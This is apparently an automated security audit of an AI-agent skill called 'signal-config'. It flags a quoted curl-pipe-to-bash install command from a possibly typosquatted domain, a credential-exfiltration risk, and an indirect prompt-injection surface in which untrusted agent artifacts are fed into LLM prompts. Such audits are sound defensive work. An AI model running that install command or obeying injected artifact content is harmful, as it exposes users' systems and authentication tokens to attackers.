signal-config

Fail

Audited by Gen Agent Trust Hub on Jun 16, 2026

Risk Level: HIGHEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill instructs the agent to install a command-line tool by piping a remote script directly into the bash shell (curl -fsSL https://cli.promptingco.com/install.sh | bash). This is a critical risk that allows for arbitrary code execution on the user's system.
  • [EXTERNAL_DOWNLOADS]: The skill downloads executable content from cli.promptingco.com. This domain is a character-substitution variation of the vendor's own promptingcompany.com domain (omitting 'mpany'), which is a common indicator of typosquatting or impersonation.
  • [COMMAND_EXECUTION]: The skill executes local system commands for installation (cp, rm) and utilizes a third-party CLI (tpc) for config validation and authentication.
  • [DATA_EXFILTRATION]: Because the skill encourages the use of tpc auth login alongside a script downloaded from an untrusted domain, there is a high risk of credential harvesting or exfiltration of authentication tokens.
  • [PROMPT_INJECTION]: The skill contains an indirect prompt injection surface. Ingestion points: It reads untrusted agent run artifacts including assistantText, userText, codeText, and toolResults. Boundary markers: It uses simple --- separators and ${text} interpolation in LLM prompts. Capability inventory: The skill can write files to disk and execute the tpc CLI tool. Sanitization: There is no evidence of filtering or sanitizing the artifact content before it is processed by the model to determine metric values.
Recommendations
  • HIGH: Downloads and executes remote code from: https://cli.promptingco.com/install.sh - DO NOT USE without thorough review
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Jun 16, 2026, 05:44 PM
Security Audit — agent-trust-hub — signal-config